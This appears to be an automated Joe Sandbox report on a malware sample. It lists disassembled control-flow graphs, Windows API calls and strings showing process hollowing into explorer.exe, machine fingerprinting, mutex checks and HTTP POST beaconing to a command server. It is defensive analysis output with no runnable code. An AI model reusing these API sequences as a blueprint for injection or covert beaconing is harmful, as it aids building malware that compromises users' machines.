            • String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
            • API String ID: 3548791621-756185880
            • Opcode ID: 6640f67aca5e743e79f7649f0c8e82eac3abce5fd335e88aced70a6a1522ed06
            • Instruction ID: a080f5579b1dcf751e077902243c150ad1ebeceabe2f2d5953d0e1edd9fc0428
            • Opcode Fuzzy Hash: 6640f67aca5e743e79f7649f0c8e82eac3abce5fd335e88aced70a6a1522ed06
            • Instruction Fuzzy Hash: D3B13871E40219ABEB20EBA4CC49FAEBBBCFB04744F144495F609FB191D770AA54CB64
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 514 2b86670-2b866b8 ObtainUserAgentString MultiByteToWideChar 515 2b866ba-2b866bf 514->515 516 2b866c1-2b866dd GetProcessHeap HeapAlloc 514->516 517 2b866f9-2b86708 call 2b864b0 515->517 518 2b866df-2b866f5 MultiByteToWideChar 516->518 519 2b866f7 516->519 522 2b8670a-2b86722 InternetOpenW 517->522 518->517 519->517 523 2b86728-2b8673f 522->523 524 2b868a6-2b868aa 522->524 525 2b86746-2b8675b InternetSetOptionW 523->525 526 2b868ac-2b868b1 524->526 527 2b868b6-2b868c7 524->527 525->525 528 2b8675d-2b8677b InternetConnectW 525->528 526->522 529 2b868c9-2b868cf GetProcessHeap HeapFree 527->529 530 2b868d1-2b868d6 527->530 533 2b86898-2b868a1 InternetCloseHandle 528->533 534 2b86781-2b867b1 HttpOpenRequestW 528->534 529->530 531 2b868d8-2b868de GetProcessHeap HeapFree 530->531 532 2b868e0-2b868e5 530->532 531->532 535 2b868ef-2b868f7 532->535 536 2b868e7-2b868ed GetProcessHeap HeapFree 532->536 533->527 539 2b868a3 533->539 537 2b8688c 534->537 538 2b867b7-2b867d8 InternetQueryOptionW 534->538 536->535 540 2b86892-2b86895 InternetCloseHandle 537->540 541 2b867da-2b867ea InternetSetOptionW 538->541 542 2b867f0-2b86806 HttpSendRequestW 538->542 539->524 540->533 541->542 543 2b86808-2b8680a 542->543 544 2b86881-2b8688a InternetCloseHandle 542->544 545 2b86810-2b8682b InternetQueryDataAvailable 543->545 544->540 546 2b8682d-2b86835 545->546 547 2b86871-2b86873 545->547 549 2b86848-2b86852 GetProcessHeap HeapReAlloc 546->549 550 2b86837-2b86846 GetProcessHeap HeapAlloc 546->550 547->545 548 2b86875-2b8687a 547->548 552 2b8687c 548->552 553 2b8687e 548->553 551 2b86858-2b8686f InternetReadFile 549->551 550->551 551->547 552->553 553->544
            APIs
            • ObtainUserAgentString.URLMON(00000000,?,?), ref: 02B86692
            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 02B866B2
            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 02B866CB
            • HeapAlloc.KERNEL32(00000000), ref: 02B866D2
            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 02B866F3
            • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02B86718
            • InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 02B86751
            • InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02B8676E
            • HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 02B867A7
            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 02B867D0
            • InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 02B867EA
            • HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,?), ref: 02B867FE
            • InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 02B86820
            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 02B86839
            • HeapAlloc.KERNEL32(00000000), ref: 02B86840
            • GetProcessHeap.KERNEL32(00000008,?,00000000), ref: 02B8684B
            • HeapReAlloc.KERNEL32(00000000), ref: 02B86852
            • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 02B86866
            • InternetCloseHandle.WININET(00000000), ref: 02B86888
            • InternetCloseHandle.WININET(00000000), ref: 02B86893
            • InternetCloseHandle.WININET(00000000), ref: 02B86899
            • GetProcessHeap.KERNEL32(00000000,?), ref: 02B868CC
            • HeapFree.KERNEL32(00000000), ref: 02B868CF
            • GetProcessHeap.KERNEL32(00000000,?), ref: 02B868DB
            • HeapFree.KERNEL32(00000000), ref: 02B868DE
            • GetProcessHeap.KERNEL32(00000000,?), ref: 02B868EA
            • HeapFree.KERNEL32(00000000), ref: 02B868ED
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
            • String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
            • API String ID: 2744214989-3343008755
            • Opcode ID: b15291452c2fde281534d06fb32c9ad0dc10fd5533e8118c8d9d42f04a938bcf
            • Instruction ID: a160eb897a14dbc0f82950627ecef82487c1666757fd5c693a942ec866678830
            • Opcode Fuzzy Hash: b15291452c2fde281534d06fb32c9ad0dc10fd5533e8118c8d9d42f04a938bcf
            • Instruction Fuzzy Hash: E6716071E40219ABEB10ABA4DC49FBEBBBCEB04754F140555FA19F7280DBB0A944CB64
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 554 2b85ab0-2b85ac3 555 2b85ac9-2b85aea GetModuleHandleW GetProcAddress 554->555 556 2b85dfe-2b85e06 554->556 555->556 557 2b85af0-2b85b01 555->557 557->556 558 2b85b07-2b85b0e 557->558 559 2b85b10-2b85b15 558->559 560 2b85b17-2b85b1a 558->560 561 2b85b25 559->561 560->556 562 2b85b20 560->562 563 2b85b27-2b85b30 561->563 562->561 563->563 564 2b85b32 563->564 565 2b85b34-2b85b40 564->565 565->565 566 2b85b42-2b85b48 565->566 567 2b85b50-2b85b5e 566->567 567->567 568 2b85b60 567->568 569 2b85b62-2b85b6b 568->569 569->569 570 2b85b6d-2b85ba5 CreateProcessW 569->570 571 2b85bab-2b85bec NtQueryInformationProcess ReadProcessMemory GetThreadContext 570->571 572 2b85df5-2b85dfd 570->572 573 2b85bf2-2b85bff 571->573 574 2b85de5-2b85df3 CloseHandle * 2 571->574 573->574 576 2b85c05-2b85c54 VirtualAllocEx WriteProcessMemory 573->576 574->572 577 2b85c8c-2b85c90 576->577 578 2b85c56-2b85c67 576->578 579 2b85da6-2b85ddf WriteProcessMemory SetThreadContext ResumeThread 577->579 580 2b85c96-2b85ca0 577->580 581 2b85c69-2b85c7b WriteProcessMemory 578->581 582 2b85c7d-2b85c88 578->582 579->574 580->579 583 2b85ca6-2b85ca9 580->583 581->582 582->578 584 2b85c8a 582->584 585 2b85cb0 583->585 584->577 586 2b85cb2-2b85cba 585->586 586->586 587 2b85cbc-2b85ccf 586->587 588 2b85cf0-2b85cfd 587->588 589 2b85cd1-2b85cd6 587->589 591 2b85d8c-2b85d9a 588->591 592 2b85d03-2b85d09 588->592 590 2b85cd8-2b85ce3 589->590 590->591 594 2b85ce9-2b85ceb 590->594 591->585 593 2b85da0 591->593 595 2b85d10-2b85d25 592->595 593->579 594->590 596 2b85ced 594->596 597 2b85d87-2b85d8a 595->597 598 2b85d27-2b85d3b 595->598 596->588 597->591 597->595 599 2b85d3d-2b85d7c ReadProcessMemory WriteProcessMemory 598->599 600 2b85d7f-2b85d85 598->600 599->600 600->597 600->598
            APIs
            • GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 02B85AD3
            • GetProcAddress.KERNEL32(00000000), ref: 02B85ADA
            • CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 02B85B9D
            • NtQueryInformationProcess.NTDLL ref: 02B85BBA
            • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 02B85BD4
            • GetThreadContext.KERNEL32(?,00010007), ref: 02B85BE4
            • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 02B85C18
            • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 02B85C42
            • WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 02B85C7B
            • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 02B85D5B
            • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 02B85D73
            • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 02B85DBB
            • SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 02B85DD6
            • ResumeThread.KERNEL32(?,?,?,00000000), ref: 02B85DDF
            • CloseHandle.KERNEL32(?), ref: 02B85DEE
            • CloseHandle.KERNEL32(00000000), ref: 02B85DF3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
            • String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
            • API String ID: 918112823-4001407722
            • Opcode ID: 13c6d9a532cfdc857b5cf0707371415f02d5542f9de9d5c6dfef78524feb4996
            • Instruction ID: bf0742a50183594ed79d5838e3f13ff6c5de6ddda38a793b58ce7ae693c76283
            • Opcode Fuzzy Hash: 13c6d9a532cfdc857b5cf0707371415f02d5542f9de9d5c6dfef78524feb4996
            • Instruction Fuzzy Hash: FEB17A71E00219AFDF20DFA8CC84FADBBB5FB48308F5544A9E909EB291D7319955CB24
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 680 2b87620-2b87664 GetPEB LsaOpenPolicy 681 2b876db-2b87729 GetComputerNameW GetUserNameW 680->681 682 2b87666-2b87677 LsaQueryInformationPolicy 680->682 683 2b8773b-2b8773d 681->683 684 2b8772b 681->684 685 2b87679-2b8767f 682->685 686 2b876d2-2b876d5 LsaClose 682->686 688 2b87740-2b87758 call 2b824f0 683->688 687 2b87730-2b87739 684->687 689 2b876cb-2b876cc LsaFreeMemory 685->689 690 2b87681-2b8769c GetProcessHeap HeapAlloc 685->690 686->681 687->683 687->687 697 2b8775a-2b877c4 call 2b87410 wsprintfA * 2 688->697 689->686 692 2b876c8 690->692 693 2b8769e-2b876ac 690->693 692->689 695 2b876ae-2b876b5 693->695 696 2b876c2-2b876c4 693->696 695->696 698 2b876b7-2b876c0 695->698 696->692 701 2b877c6-2b877d5 697->701 702 2b877d7-2b8780b call 2b86670 697->702 698->696 698->698 701->701 701->702 705 2b8780d-2b87813 GetProcessHeap HeapFree 702->705 706 2b87815-2b87817 702->706 705->706 707 2b87819-2b8781f GetProcessHeap HeapFree 706->707 708 2b87821-2b87827 706->708 707->708
            APIs
            • LsaOpenPolicy.ADVAPI32(00000000,02B8A060,00000001,?), ref: 02B8765C
            • LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 02B8766F
            • GetProcessHeap.KERNEL32(00000008,?), ref: 02B8768B
            • HeapAlloc.KERNEL32(00000000), ref: 02B87692
            • LsaFreeMemory.ADVAPI32(?), ref: 02B876CC
            • LsaClose.ADVAPI32(?), ref: 02B876D5
            • GetComputerNameW.KERNEL32(?,?), ref: 02B876F4
            • GetUserNameW.ADVAPI32(?,00000101), ref: 02B87705
            • wsprintfA.USER32 ref: 02B87786
            • wsprintfA.USER32 ref: 02B877B9
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B87810
            • HeapFree.KERNEL32(00000000), ref: 02B87813
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B8781C
            • HeapFree.KERNEL32(00000000), ref: 02B8781F
            Strings
            • 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 02B87716
            • %s|%d.%d (%d)|%S|%S|%S, xrefs: 02B877B3
            • %d|%s|%.16s|, xrefs: 02B87780
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: Heap$FreeProcess$NamePolicywsprintf$AllocCloseComputerInformationMemoryOpenQueryUser
            • String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%S|%S|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
            • API String ID: 3257352186-369990036
            • Opcode ID: 489032fc075d77cab723c84f94b0ceabb56822107389b23ebe4f9895ae648fc1
            • Instruction ID: 8790bf59f6a4930bb344a333e6ddea3ef89f1d933f55a6807f09ce3d614aeb5b
            • Opcode Fuzzy Hash: 489032fc075d77cab723c84f94b0ceabb56822107389b23ebe4f9895ae648fc1
            • Instruction Fuzzy Hash: 2551D375E00249AFEB11EBA4CC44BEEBBB9FF44308F1404E9E949E7111DB709A55DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 709 2b87830-2b87844 710 2b878a8-2b878c0 709->710 711 2b87846-2b8784e 709->711 712 2b878ca-2b878cc 710->712 713 2b878c2-2b878c8 710->713 711->710 714 2b87850-2b87858 711->714 715 2b878d0-2b878e5 call 2b824f0 712->715 713->712 713->713 716 2b87860-2b8786a 714->716 726 2b878e7-2b87948 call 2b87410 wnsprintfA wsprintfA 715->726 718 2b8786c-2b8786e 716->718 719 2b87877-2b8787e StrCmpNIA 716->719 718->719 723 2b87870-2b87875 718->723 720 2b87880-2b8788d 719->720 721 2b87891-2b878a2 719->721 720->716 724 2b8788f 720->724 721->710 725 2b87d14-2b87d1a 721->725 723->719 723->723 724->710 729 2b8794a 726->729 730 2b87961-2b8798a call 2b86670 726->730 732 2b87950-2b8795f 729->732 730->725 734 2b87990 730->734 732->730 732->732 735 2b87992-2b8799b 734->735 736 2b879a0-2b879a8 735->736 737 2b879aa-2b879ac 736->737 738 2b879b0-2b879b2 736->738 737->736 739 2b879ae 737->739 740 2b879b4-2b879c0 738->740 741 2b879c5-2b879cb 738->741 739->735 742 2b87a7a-2b87a8b 740->742 743 2b879d0-2b879d8 741->743 744 2b87a91-2b87a93 742->744 745 2b87d02-2b87d0e GetProcessHeap HeapFree 742->745 746 2b879da-2b879dc 743->746 747 2b879e0-2b879e2 743->747 744->745 748 2b87a99-2b87aa0 744->748 745->725 746->743 749 2b879de 746->749 750 2b879e8 747->750 751 2b879e4-2b879e6 747->751 748->745 753 2b87aa6 748->753 749->741 752 2b879eb-2b879f3 750->752 751->752 754 2b87a01 752->754 755 2b879f5-2b879fc 752->755 756 2b87aa8-2b87ab3 753->756 757 2b87a04-2b87a0f 754->757 755->742 756->756 758 2b87ab5-2b87ac4 call 2b87410 756->758 759 2b87a10-2b87a18 757->759 767 2b87ac6-2b87ad5 758->767 768 2b87ad7-2b87add 758->768 761 2b87a1a-2b87a1c 759->761 762 2b87a20-2b87a22 759->762 761->759 764 2b87a1e 761->764 765 2b87a30-2b87a3b 762->765 766 2b87a24-2b87a2e 762->766 764->757 770 2b87a40-2b87a48 765->770 769 2b87a77 766->769 767->767 767->768 771 2b87cfb-2b87cfd call 2b85ab0 768->771 772 2b87ae3-2b87ae6 768->772 769->742 776 2b87a4a-2b87a4c 770->776 777 2b87a50-2b87a52 770->777 771->745 773 2b87aec-2b87aef 772->773 774 2b87cf0-2b87cf9 call 2b85e10 772->774 773->745 779 2b87af5-2b87af8 773->779 774->745 776->770 780 2b87a4e 776->780 781 2b87a58 777->781 782 2b87a54-2b87a56 777->782 779->745 785 2b87afe-2b87b06 779->785 780->765 783 2b87a5b-2b87a65 781->783 782->783 783->769 786 2b87a67-2b87a69 783->786 787 2b87b08 785->787 788 2b87b1a-2b87b1e 785->788 786->769 789 2b87a6b 786->789 790 2b87b10-2b87b18 787->790 791 2b87b20-2b87b30 788->791 792 2b87b32-2b87b3c 788->792 793 2b87a70-2b87a75 789->793 790->788 790->790 791->791 791->792 794 2b87b40-2b87b48 792->794 793->769 793->793 794->794 795 2b87b4a-2b87b4e 794->795 796 2b87b50-2b87b60 795->796 797 2b87b62-2b87b75 call 2b85880 795->797 796->796 796->797 797->745 800 2b87b7b-2b87ba2 797->800 800->745 801 2b87ba8 800->801 802 2b87bb0-2b87bc3 lstrcmpA 801->802 803 2b87bd3-2b87be2 802->803 804 2b87bc5-2b87bcc 802->804 803->745 806 2b87be8-2b87bef 803->806 804->802 805 2b87bce 804->805 805->745 807 2b87bf8-2b87c25 EnterCriticalSection 806->807 808 2b87bf1-2b87bf6 806->808 810 2b87c45-2b87c49 807->810 811 2b87c27-2b87c2f 807->811 808->807 808->808 813 2b87c4b-2b87c4d 810->813 814 2b87c64-2b87c74 810->814 812 2b87c32-2b87c35 811->812 817 2b87c3f 812->817 818 2b87c37-2b87c3d 812->818 819 2b87c50-2b87c54 813->819 815 2b87c76-2b87c85 GetProcessHeap HeapAlloc 814->815 816 2b87c87-2b87c91 GetProcessHeap HeapReAlloc 814->816 822 2b87c97-2b87ca1 815->822 816->822 817->810 818->812 818->817 820 2b87c60-2b87c62 819->820 821 2b87c56-2b87c5c 819->821 820->814 824 2b87cba-2b87cc1 820->824 821->819 823 2b87c5e 821->823 825 2b87ce3-2b87cee LeaveCriticalSection 822->825 826 2b87ca3-2b87cb7 822->826 823->814 827 2b87cdf 824->827 828 2b87cc3-2b87cc5 824->828 825->745 826->824 827->825 829 2b87cce-2b87cd2 828->829 830 2b87cc7-2b87ccc 828->830 829->827 831 2b87cd4-2b87cdd 829->831 830->829 830->830 831->827 831->831
            APIs
            • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 02B8787A
            • wnsprintfA.SHLWAPI ref: 02B87912
            • wsprintfA.USER32 ref: 02B87939
            • lstrcmpA.KERNEL32(?,Start), ref: 02B87BBB
            • EnterCriticalSection.KERNEL32(02B8A088), ref: 02B87C11
            • GetProcessHeap.KERNEL32(00000008,?), ref: 02B87C78
            • HeapAlloc.KERNEL32(00000000), ref: 02B87C7F
            • GetProcessHeap.KERNEL32(00000008,?,?), ref: 02B87C8A
            • HeapReAlloc.KERNEL32(00000000), ref: 02B87C91
            • LeaveCriticalSection.KERNEL32(02B8A088), ref: 02B87CE8
              • Part of subcall function 02B85E10: GetModuleHandleW.KERNEL32(ntdll), ref: 02B85E2D
              • Part of subcall function 02B85E10: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 02B85E41
              • Part of subcall function 02B85E10: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 02B85E4C
              • Part of subcall function 02B85E10: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 02B85E57
              • Part of subcall function 02B85E10: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 02B85E62
              • Part of subcall function 02B85E10: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 02B85E6D
              • Part of subcall function 02B85E10: GetTempPathW.KERNEL32(000000F6,?), ref: 02B85E86
              • Part of subcall function 02B85E10: wnsprintfW.SHLWAPI ref: 02B85EC1
              • Part of subcall function 02B85E10: PathCombineW.SHLWAPI(?,?,?), ref: 02B85EDB
              • Part of subcall function 02B85E10: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 02B85F02
              • Part of subcall function 02B85E10: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02B85F26
              • Part of subcall function 02B85E10: SetEndOfFile.KERNEL32(00000000), ref: 02B85F29
              • Part of subcall function 02B85E10: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 02B85F36
              • Part of subcall function 02B85E10: wnsprintfW.SHLWAPI ref: 02B85F54
            • GetProcessHeap.KERNEL32(00000000,?), ref: 02B87D07
            • HeapFree.KERNEL32(00000000), ref: 02B87D0E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
            • String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
            • API String ID: 851647271-3778496198
            • Opcode ID: dac2a0880e9a6773016b78637ea2e6e5bfa2c2e7f83a2ace448c53c0437d518d
            • Instruction ID: 2b4f7772b2356aa5fc7e1feb58961ea1fb59ed2f241ef2045ceaf74912da70d2
            • Opcode Fuzzy Hash: dac2a0880e9a6773016b78637ea2e6e5bfa2c2e7f83a2ace448c53c0437d518d
            • Instruction Fuzzy Hash: F7E14839A012569FEB15EF28C89077AFBA2FB8520CF3845EDC85E97241DF309942DB50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • InitializeCriticalSection.KERNEL32(02B8A088), ref: 02B88332
              • Part of subcall function 02B86FE0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 02B8700A
              • Part of subcall function 02B86FE0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 02B87026
              • Part of subcall function 02B86FE0: GetProcessHeap.KERNEL32(00000008,?), ref: 02B87039
              • Part of subcall function 02B86FE0: HeapAlloc.KERNEL32(00000000), ref: 02B87040
              • Part of subcall function 02B86FE0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 02B8705D
              • Part of subcall function 02B86FE0: RegCloseKey.ADVAPI32(80000002), ref: 02B87069
            • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02B8835F
            • StringFromGUID2.OLE32(?,?,00000080), ref: 02B883B8
            • wsprintfA.USER32 ref: 02B883CF
            • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 02B883E3
            • GetLastError.KERNEL32 ref: 02B883EE
            • ExitProcess.KERNEL32 ref: 02B884F3
              • Part of subcall function 02B824F0: GetTickCount.KERNEL32 ref: 02B824F2
            • WSAStartup.WS2_32(00000202,?), ref: 02B8842C
            • CryptAcquireContextA.ADVAPI32(02B8A4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 02B88445
            • CryptAcquireContextA.ADVAPI32(02B8A4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 02B88461
            • CoInitializeEx.OLE32(00000000,00000000), ref: 02B884AC
            • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 02B884C3
            • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 02B884E2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
            • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
            • API String ID: 267019445-2941900213
            • Opcode ID: 440d8aa7750d12d8c1501b50e700a631440efc8479494fbe3e42600567c1743b
            • Instruction ID: f89c7c761181632263f115d19b792ccaf5cee99f36873eb861cac3db88d3fe3d
            • Opcode Fuzzy Hash: 440d8aa7750d12d8c1501b50e700a631440efc8479494fbe3e42600567c1743b
            • Instruction Fuzzy Hash: FC41E570A80309ABF720EB64DC4AFA937B8FB04709F1840A6F60EEB191EBB05545CF55
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • InitializeCriticalSection.KERNEL32(02B8A088), ref: 02B88332
              • Part of subcall function 02B86FE0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 02B8700A
              • Part of subcall function 02B86FE0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 02B87026
              • Part of subcall function 02B86FE0: GetProcessHeap.KERNEL32(00000008,?), ref: 02B87039
              • Part of subcall function 02B86FE0: HeapAlloc.KERNEL32(00000000), ref: 02B87040
              • Part of subcall function 02B86FE0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 02B8705D
              • Part of subcall function 02B86FE0: RegCloseKey.ADVAPI32(80000002), ref: 02B87069
            • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02B8835F
            • StringFromGUID2.OLE32(?,?,00000080), ref: 02B883B8
            • wsprintfA.USER32 ref: 02B883CF
            • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 02B883E3
            • GetLastError.KERNEL32 ref: 02B883EE
            • ExitProcess.KERNEL32 ref: 02B884F3
              • Part of subcall function 02B824F0: GetTickCount.KERNEL32 ref: 02B824F2
            • WSAStartup.WS2_32(00000202,?), ref: 02B8842C
            • CryptAcquireContextA.ADVAPI32(02B8A4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 02B88445
            • CryptAcquireContextA.ADVAPI32(02B8A4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 02B88461
            • CoInitializeEx.OLE32(00000000,00000000), ref: 02B884AC
            • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 02B884C3
            • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 02B884E2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
            • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
            • API String ID: 267019445-2941900213
            • Opcode ID: abc0dcece5a14e925d0d968381d14e2ebaf1ac579b45a96868286e7c895d2c05
            • Instruction ID: 4eab8604c7ae69b646887a8d1c3f9317a4340ad2a58a09b332403122437c894f
            • Opcode Fuzzy Hash: abc0dcece5a14e925d0d968381d14e2ebaf1ac579b45a96868286e7c895d2c05
            • Instruction Fuzzy Hash: 3B41D671A80309AFE720EB64DC4AFA937B8FB04704F1840A9F60DEB191EBB45549CF55
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CryptGenRandom.ADVAPI32(00000020,?), ref: 02B88F88
              • Part of subcall function 02B82690: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,02B88FD5,00000000), ref: 02B826B2
              • Part of subcall function 02B82690: HeapAlloc.KERNEL32(00000000,?,?,?,?,02B88FD5,00000000), ref: 02B826B9
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B88FE5
            • HeapFree.KERNEL32(00000000), ref: 02B88FEC
            • wsprintfA.USER32 ref: 02B8901F
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B89058
